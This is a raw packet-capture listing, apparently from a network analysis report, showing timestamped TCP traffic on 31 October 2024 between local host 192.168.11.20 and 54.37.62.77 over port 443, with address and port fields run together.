                                                                                                                                                                                                  Oct 31, 2024 18:05:23.611748934 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.611805916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.611969948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.611969948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.612049103 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.612083912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.612212896 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.612881899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.612930059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.613200903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.613234997 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.613419056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.613940001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.613995075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614147902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614147902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614147902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614214897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614234924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614234924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.614413977 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615046978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615092993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615269899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615271091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615331888 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615448952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.615520000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616559982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616616011 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616782904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616782904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616831064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616857052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.616889000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617036104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617465973 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617522001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617698908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617700100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617753983 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617779016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.617952108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.618540049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.618583918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.618773937 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.618855953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.618891001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619075060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619540930 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619597912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619760990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619760990 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619802952 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619824886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619869947 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.619937897 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620383978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620431900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620611906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620611906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620651960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.620810032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621140957 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621186018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621385098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621385098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621536970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621587992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.621795893 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622195005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622240067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622406006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622406006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622466087 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622499943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622596025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622638941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.622960091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623003960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623150110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623150110 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623292923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623347998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623523951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623897076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.623944044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.624717951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.624974966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625135899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625135899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625199080 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625646114 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625646114 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625900984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.625941038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626040936 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626372099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626404047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626553059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626708984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626755953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626935005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.626986980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.627305031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.627717018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.627758026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.627931118 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628010988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628042936 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628751993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628815889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628935099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628935099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.628989935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.629015923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.629015923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.629015923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.629108906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630036116 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630080938 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630244970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630244970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630244970 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630304098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.630328894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631117105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631166935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631314039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631314039 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631369114 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631391048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631495953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631793976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631834984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631985903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.631985903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.632038116 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.632061005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.632165909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.679483891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.735476971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.735533953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.735683918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.735724926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.735899925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.736057997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.736849070 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.736907959 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737082005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737082005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737082005 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737147093 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737181902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737181902 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.737380981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739236116 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739295006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739511013 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739562988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739581108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.739777088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740705967 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740762949 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740926027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740926027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740926027 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.740991116 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.741009951 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.741190910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742093086 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742150068 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742316961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742373943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742373943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742405891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.742605925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.743463993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.743520975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.744389057 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.744446993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.744602919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745176077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745220900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745281935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745474100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745836973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.745881081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746056080 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746093988 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746121883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746269941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746269941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746305943 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746354103 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746385098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746515036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746515036 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746560097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746922970 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.746968985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747153044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747153044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747153044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747215986 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747239113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747395992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747582912 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747627020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747828960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747828960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747828960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.747886896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.748068094 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751341105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751384020 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751545906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751545906 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751606941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751633883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751663923 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.751817942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753031969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753087997 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753249884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753251076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753251076 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753315926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753350019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753525972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753720999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753765106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753941059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.753941059 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754000902 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754019976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754225016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754754066 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754798889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754977942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.754977942 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755040884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755040884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755040884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755074024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755291939 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755588055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755630016 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755773067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755773067 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755830050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755831003 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755858898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.755886078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.756015062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.756515980 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.756560087 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757215977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757451057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757608891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757608891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757652998 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.757976055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758018017 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758137941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758333921 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758519888 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758543968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758723021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758723021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758888960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.758939028 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759119987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759119987 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759175062 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759198904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759198904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759406090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759445906 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759579897 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759581089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759639978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:23.759661913 CET49755443192.168.11.2054.37.62.77
